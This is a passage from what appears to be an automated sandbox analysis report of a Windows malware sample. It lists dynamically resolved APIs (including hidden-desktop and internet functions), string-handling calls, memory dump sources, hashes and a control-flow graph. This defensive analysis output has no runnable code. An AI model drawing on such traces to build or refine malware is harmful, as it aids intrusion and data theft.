                        • GetProcAddress.KERNEL32(74DD0000,01589670), ref: 0046673E
                        • GetProcAddress.KERNEL32(74DD0000,01589640), ref: 00466756
                        • GetProcAddress.KERNEL32(74DD0000,01589688), ref: 0046676F
                        • GetProcAddress.KERNEL32(74DD0000,0157B798), ref: 00466787
                        • GetProcAddress.KERNEL32(74DD0000,0158D670), ref: 0046679F
                        • GetProcAddress.KERNEL32(74DD0000,0158D5E0), ref: 004667B8
                        • GetProcAddress.KERNEL32(74DD0000,0158D5B0), ref: 004667D0
                        • GetProcAddress.KERNEL32(74DD0000,0158D598), ref: 004667E8
                        • GetProcAddress.KERNEL32(74DD0000,015758F0), ref: 00466801
                        • GetProcAddress.KERNEL32(74DD0000,015757F0), ref: 00466819
                        • GetProcAddress.KERNEL32(74DD0000,01575830), ref: 00466831
                        • GetProcAddress.KERNEL32(74DD0000,01575850), ref: 0046684A
                        • GetProcAddress.KERNEL32(74DD0000,0158D610), ref: 00466862
                        • GetProcAddress.KERNEL32(74DD0000,0158D628), ref: 0046687A
                        • GetProcAddress.KERNEL32(74DD0000,0157B7C0), ref: 00466893
                        • GetProcAddress.KERNEL32(74DD0000,01575910), ref: 004668AB
                        • GetProcAddress.KERNEL32(74DD0000,0158D658), ref: 004668C3
                        • GetProcAddress.KERNEL32(74DD0000,0158D6A0), ref: 004668DC
                        • GetProcAddress.KERNEL32(74DD0000,0158D520), ref: 004668F4
                        • GetProcAddress.KERNEL32(74DD0000,0158D5C8), ref: 0046690C
                        • GetProcAddress.KERNEL32(74DD0000,01575990), ref: 00466925
                        • GetProcAddress.KERNEL32(74DD0000,0158D508), ref: 0046693D
                        • GetProcAddress.KERNEL32(74DD0000,0158D688), ref: 00466955
                        • GetProcAddress.KERNEL32(74DD0000,0158D6B8), ref: 0046696E
                        • GetProcAddress.KERNEL32(74DD0000,0158D580), ref: 00466986
                        • GetProcAddress.KERNEL32(74DD0000,0158D5F8), ref: 0046699E
                        • GetProcAddress.KERNEL32(74DD0000,0158D538), ref: 004669B7
                        • GetProcAddress.KERNEL32(74DD0000,0158D550), ref: 004669CF
                        • GetProcAddress.KERNEL32(74DD0000,0158D568), ref: 004669E7
                        • GetProcAddress.KERNEL32(74DD0000,0158D640), ref: 00466A00
                        • GetProcAddress.KERNEL32(74DD0000,0158A320), ref: 00466A18
                        • GetProcAddress.KERNEL32(74DD0000,0158D1D8), ref: 00466A30
                        • GetProcAddress.KERNEL32(74DD0000,0158D190), ref: 00466A49
                        • GetProcAddress.KERNEL32(74DD0000,015759B0), ref: 00466A61
                        • GetProcAddress.KERNEL32(74DD0000,0158D058), ref: 00466A79
                        • GetProcAddress.KERNEL32(74DD0000,015759F0), ref: 00466A92
                        • GetProcAddress.KERNEL32(74DD0000,0158CFC8), ref: 00466AAA
                        • GetProcAddress.KERNEL32(74DD0000,0158D178), ref: 00466AC2
                        • GetProcAddress.KERNEL32(74DD0000,01575A10), ref: 00466ADB
                        • GetProcAddress.KERNEL32(74DD0000,01575B50), ref: 00466AF3
                        • LoadLibraryA.KERNEL32(0158D1C0,0046051F), ref: 00466B05
                        • LoadLibraryA.KERNEL32(0158D010), ref: 00466B16
                        • LoadLibraryA.KERNEL32(0158D070), ref: 00466B28
                        • LoadLibraryA.KERNEL32(0158D028), ref: 00466B3A
                        • LoadLibraryA.KERNEL32(0158D118), ref: 00466B4B
                        • LoadLibraryA.KERNEL32(0158D1F0), ref: 00466B5D
                        • LoadLibraryA.KERNEL32(0158D0A0), ref: 00466B6F
                        • LoadLibraryA.KERNEL32(0158D100), ref: 00466B80
                        • GetProcAddress.KERNEL32(75290000,01575C30), ref: 00466B9C
                        • GetProcAddress.KERNEL32(75290000,0158D040), ref: 00466BB4
                        • GetProcAddress.KERNEL32(75290000,01588F18), ref: 00466BCD
                        • GetProcAddress.KERNEL32(75290000,0158CFF8), ref: 00466BE5
                        • GetProcAddress.KERNEL32(75290000,01575E30), ref: 00466BFD
                        • GetProcAddress.KERNEL32(73B40000,0157BAB8), ref: 00466C1D
                        • GetProcAddress.KERNEL32(73B40000,01575C10), ref: 00466C35
                        • GetProcAddress.KERNEL32(73B40000,0157B9A0), ref: 00466C4E
                        • GetProcAddress.KERNEL32(73B40000,0158CF08), ref: 00466C66
                        • GetProcAddress.KERNEL32(73B40000,0158D0E8), ref: 00466C7E
                        • GetProcAddress.KERNEL32(73B40000,01575B70), ref: 00466C97
                        • GetProcAddress.KERNEL32(73B40000,01575E50), ref: 00466CAF
                        • GetProcAddress.KERNEL32(73B40000,0158D088), ref: 00466CC7
                        • GetProcAddress.KERNEL32(752C0000,01575C70), ref: 00466CE3
                        • GetProcAddress.KERNEL32(752C0000,01575BF0), ref: 00466CFB
                        • GetProcAddress.KERNEL32(752C0000,0158D130), ref: 00466D14
                        • GetProcAddress.KERNEL32(752C0000,0158D148), ref: 00466D2C
                        • GetProcAddress.KERNEL32(752C0000,01575AB0), ref: 00466D44
                        • GetProcAddress.KERNEL32(74EC0000,0157B9C8), ref: 00466D64
                        • GetProcAddress.KERNEL32(74EC0000,0157B9F0), ref: 00466D7C
                        • GetProcAddress.KERNEL32(74EC0000,0158D0B8), ref: 00466D95
                        • GetProcAddress.KERNEL32(74EC0000,01575B30), ref: 00466DAD
                        • GetProcAddress.KERNEL32(74EC0000,01575CB0), ref: 00466DC5
                        • GetProcAddress.KERNEL32(74EC0000,0157B928), ref: 00466DDE
                        • GetProcAddress.KERNEL32(75BD0000,0158D160), ref: 00466DFE
                        • GetProcAddress.KERNEL32(75BD0000,01575BD0), ref: 00466E16
                        • GetProcAddress.KERNEL32(75BD0000,01588F28), ref: 00466E2F
                        • GetProcAddress.KERNEL32(75BD0000,0158D0D0), ref: 00466E47
                        • GetProcAddress.KERNEL32(75BD0000,0158D1A8), ref: 00466E5F
                        • GetProcAddress.KERNEL32(75BD0000,01575B90), ref: 00466E78
                        • GetProcAddress.KERNEL32(75BD0000,01575AF0), ref: 00466E90
                        • GetProcAddress.KERNEL32(75BD0000,0158CF20), ref: 00466EA8
                        • GetProcAddress.KERNEL32(75BD0000,0158CF80), ref: 00466EC1
                        • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 00466ED7
                        • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 00466EEE
                        • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00466F05
                        • GetProcAddress.KERNEL32(75A70000,01575CD0), ref: 00466F21
                        • GetProcAddress.KERNEL32(75A70000,0158CF38), ref: 00466F39
                        • GetProcAddress.KERNEL32(75A70000,0158CF50), ref: 00466F52
                        • GetProcAddress.KERNEL32(75A70000,0158CFE0), ref: 00466F6A
                        • GetProcAddress.KERNEL32(75A70000,0158CF68), ref: 00466F82
                        • GetProcAddress.KERNEL32(75450000,01575C50), ref: 00466F9E
                        • GetProcAddress.KERNEL32(75450000,01575BB0), ref: 00466FB6
                        • GetProcAddress.KERNEL32(75DA0000,01575C90), ref: 00466FD2
                        • GetProcAddress.KERNEL32(75DA0000,0158CF98), ref: 00466FEA
                        • GetProcAddress.KERNEL32(6F070000,01575E10), ref: 0046700A
                        • GetProcAddress.KERNEL32(6F070000,01575CF0), ref: 00467022
                        • GetProcAddress.KERNEL32(6F070000,01575D10), ref: 0046703B
                        • GetProcAddress.KERNEL32(6F070000,0158CFB0), ref: 00467053
                        • GetProcAddress.KERNEL32(6F070000,01575D30), ref: 0046706B
                        • GetProcAddress.KERNEL32(6F070000,01575B10), ref: 00467084
                        • GetProcAddress.KERNEL32(6F070000,01575D90), ref: 0046709C
                        • GetProcAddress.KERNEL32(6F070000,01575D50), ref: 004670B4
                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 004670CB
                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 004670E2
                        • GetProcAddress.KERNEL32(75AF0000,0158D280), ref: 004670FE
                        • GetProcAddress.KERNEL32(75AF0000,01589048), ref: 00467116
                        • GetProcAddress.KERNEL32(75AF0000,0158D238), ref: 0046712F
                        • GetProcAddress.KERNEL32(75AF0000,0158D3B8), ref: 00467147
                        • GetProcAddress.KERNEL32(75D90000,01575DB0), ref: 00467163
                        • GetProcAddress.KERNEL32(6CE70000,0158D3E8), ref: 0046717F
                        • GetProcAddress.KERNEL32(6CE70000,01575D70), ref: 00467197
                        • GetProcAddress.KERNEL32(6CE70000,0158D400), ref: 004671B0
                        • GetProcAddress.KERNEL32(6CE70000,0158D208), ref: 004671C8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                        • API String ID: 2238633743-3468015613
                        • Opcode ID: 418c34d4253a7e077381f16ccdfca25018462367ef674168d321f27c65c5cd5a
                        • Instruction ID: 595af629bd48e1c01ede9fc3309a11b66fd6405488dae7d93c35e64f4aba822b
                        • Opcode Fuzzy Hash: 418c34d4253a7e077381f16ccdfca25018462367ef674168d321f27c65c5cd5a
                        • Instruction Fuzzy Hash: 2B621DB56A02009FD75CDF64EC8CA2A37FBF789755310A91DE95D83264EA34A880DB70
                        Function 0045F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(0046CFEC), ref: 0045F1D5
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045F1F1
                        • lstrlen.KERNEL32(0046CFEC), ref: 0045F1FC
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045F215
                        • lstrlen.KERNEL32(0046CFEC), ref: 0045F220
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045F239
                        • lstrcpy.KERNEL32(00000000,00474FA0), ref: 0045F25E
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045F28C
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045F2C0
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045F2F0
                        • lstrlen.KERNEL32(015759D0), ref: 0045F315
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: ERROR
                        • API String ID: 367037083-2861137601
                        • Opcode ID: e88d409734c94f5768148f97ccd10e885e223ea07bb46170d06d2ad30c75d1fb
                        • Instruction ID: 6181bbc9e594108f1faab5f43710751a8b1df205eac8f8a4f7d70a57a1851318
                        • Opcode Fuzzy Hash: e88d409734c94f5768148f97ccd10e885e223ea07bb46170d06d2ad30c75d1fb
                        • Instruction Fuzzy Hash: F4A27D70A012029FDB24DF65C948A5BB7F5AF44305F58807AEC09DB362EB39DC4ACB56
                        Function 0045FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00460013
                        • lstrlen.KERNEL32(0046CFEC), ref: 004600BD
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004600E1
                        • lstrlen.KERNEL32(0046CFEC), ref: 004600EC
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00460110
                        • lstrlen.KERNEL32(0046CFEC), ref: 0046011B
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0046013F
                        • lstrlen.KERNEL32(0046CFEC), ref: 0046015A
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00460189
                        • lstrlen.KERNEL32(0046CFEC), ref: 00460194
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004601C3
                        • lstrlen.KERNEL32(0046CFEC), ref: 004601CE
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00460206
                        • lstrlen.KERNEL32(0046CFEC), ref: 00460250
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00460288
                        • lstrcpy.KERNEL32(00000000,?), ref: 0046059B
                        • lstrlen.KERNEL32(015757B0), ref: 004605AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 004605D7
                        • lstrcat.KERNEL32(00000000,?), ref: 004605E3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0046060E
                        • lstrlen.KERNEL32(0158E448), ref: 00460625
                        • lstrcpy.KERNEL32(00000000,?), ref: 0046064C
                        • lstrcat.KERNEL32(00000000,?), ref: 00460658
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00460681
                        • lstrlen.KERNEL32(01575770), ref: 00460698
                        • lstrcpy.KERNEL32(00000000,?), ref: 004606C9
                        • lstrcat.KERNEL32(00000000,?), ref: 004606D5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00460706
                        • lstrcpy.KERNEL32(00000000,015890D8), ref: 0046074B
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441557
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441579
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 0044159B
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 004415FF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0046077F
                        • lstrcpy.KERNEL32(00000000,0158E298), ref: 004607E7
                        • lstrcpy.KERNEL32(00000000,01589128), ref: 00460858
                        • lstrcpy.KERNEL32(00000000,fplugins), ref: 004608CF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00460928
                        • lstrcpy.KERNEL32(00000000,015892A8), ref: 004609F8
                          • Part of subcall function 004424E0: lstrcpy.KERNEL32(00000000,?), ref: 00442528
                          • Part of subcall function 004424E0: lstrcpy.KERNEL32(00000000,?), ref: 0044254E
                          • Part of subcall function 004424E0: lstrcpy.KERNEL32(00000000,?), ref: 00442577
                        • lstrcpy.KERNEL32(00000000,01589118), ref: 00460ACE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00460B81
                        • lstrcpy.KERNEL32(00000000,01589118), ref: 00460D58
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID: fplugins
                        • API String ID: 2500673778-38756186
                        • Opcode ID: 0e5a7ffb4928dd12a9013ad152b6f7e15c95d8d165e39d14ab6cd481551ad4eb
                        • Instruction ID: b28a94908d527e71986c4535a070a82c29ee84499460ad599af871c2096c2d53
                        • Opcode Fuzzy Hash: 0e5a7ffb4928dd12a9013ad152b6f7e15c95d8d165e39d14ab6cd481551ad4eb
                        • Instruction Fuzzy Hash: 1CE26C70A053418FD734DF29C588B5BBBE1BF88304F58856EE48D8B362EB399845CB56
                        Function 0045F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(015759D0), ref: 0045F315
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045F3A3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045F3C7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045F47B
                        • lstrcpy.KERNEL32(00000000,015759D0), ref: 0045F4BB
                        • lstrcpy.KERNEL32(00000000,01589078), ref: 0045F4EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045F59E
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0045F61C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045F64C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045F69A
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0045F718
                        • lstrlen.KERNEL32(01588F88), ref: 0045F746
                        • lstrcpy.KERNEL32(00000000,01588F88), ref: 0045F771
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045F793
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045F7E4
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0045FA32
                        • lstrlen.KERNEL32(01588F08), ref: 0045FA60
                        • lstrcpy.KERNEL32(00000000,01588F08), ref: 0045FA8B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045FAAD
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045FAFE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: ERROR
                        • API String ID: 367037083-2861137601
                        • Opcode ID: 8e03530eddabf97dd6b7a34e47238cd4c6110d85e67f3d5d2f7cde6e092fd552
                        • Instruction ID: d9a07f9239292c9196a4f4ced4bdf5c6a33b49d1c609fec727db484dd42fcc0d
                        • Opcode Fuzzy Hash: 8e03530eddabf97dd6b7a34e47238cd4c6110d85e67f3d5d2f7cde6e092fd552
                        • Instruction Fuzzy Hash: CBF14E70A01201CFDB24CF65C948A5AB7E6BF44316B5881BFDC099B362D739DC8ACB56
                        Function 00458CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2721 458ca0-458cc4 StrCmpCA 2722 458cc6-458cc7 ExitProcess 2721->2722 2723 458ccd-458ce6 2721->2723 2725 458ee2-458eef call 442a20 2723->2725 2726 458cec-458cf1 2723->2726 2728 458cf6-458cf9 2726->2728 2729 458ec3-458edc 2728->2729 2730 458cff 2728->2730 2729->2725 2764 458cf3 2729->2764 2732 458d84-458d92 StrCmpCA 2730->2732 2733 458da4-458db8 StrCmpCA 2730->2733 2734 458d06-458d15 lstrlen 2730->2734 2735 458e6f-458e7d StrCmpCA 2730->2735 2736 458e88-458e9a lstrlen 2730->2736 2737 458e56-458e64 StrCmpCA 2730->2737 2738 458d30-458d3f lstrlen 2730->2738 2739 458dbd-458dcb StrCmpCA 2730->2739 2740 458ddd-458deb StrCmpCA 2730->2740 2741 458dfd-458e0b StrCmpCA 2730->2741 2742 458e1d-458e2b StrCmpCA 2730->2742 2743 458e3d-458e4b StrCmpCA 2730->2743 2744 458d5a-458d69 lstrlen 2730->2744 2732->2729 2748 458d98-458d9f 2732->2748 2733->2729 2753 458d17-458d1c call 442a20 2734->2753 2754 458d1f-458d2b call 442930 2734->2754 2735->2729 2757 458e7f-458e86 2735->2757 2758 458ea4-458eb0 call 442930 2736->2758 2759 458e9c-458ea1 call 442a20 2736->2759 2737->2729 2756 458e66-458e6d 2737->2756 2760 458d41-458d46 call 442a20 2738->2760 2761 458d49-458d55 call 442930 2738->2761 2739->2729 2749 458dd1-458dd8 2739->2749 2740->2729 2750 458df1-458df8 2740->2750 2741->2729 2751 458e11-458e18 2741->2751 2742->2729 2752 458e31-458e38 2742->2752 2743->2729 2755 458e4d-458e54 2743->2755 2745 458d73-458d7f call 442930 2744->2745 2746 458d6b-458d70 call 442a20 2744->2746 2779 458eb3-458eb5 2745->2779 2746->2745 2748->2729 2749->2729 2750->2729 2751->2729 2752->2729 2753->2754 2754->2779 2755->2729 2756->2729 2757->2729 2758->2779 2759->2758 2760->2761 2761->2779 2764->2728 2779->2729 2780 458eb7-458eb9 2779->2780 2780->2729 2781 458ebb-458ebd lstrcpy 2780->2781 2781->2729
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 8014927a6c6ba502f4ea5545ede5a3ffee3fc64f7a6e0f142f53b5039dcae8ad
                        • Instruction ID: a33bdaec3f09d2ca671d791a28bad6173b7017541789d7c9ee1ad30631160318
                        • Opcode Fuzzy Hash: 8014927a6c6ba502f4ea5545ede5a3ffee3fc64f7a6e0f142f53b5039dcae8ad
                        • Instruction Fuzzy Hash: 1F51C070A00701AFC7219F75DD85A6B77F4BB54706B10581FE846E2612DFBCD84A8B2A
                        Function 00462740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
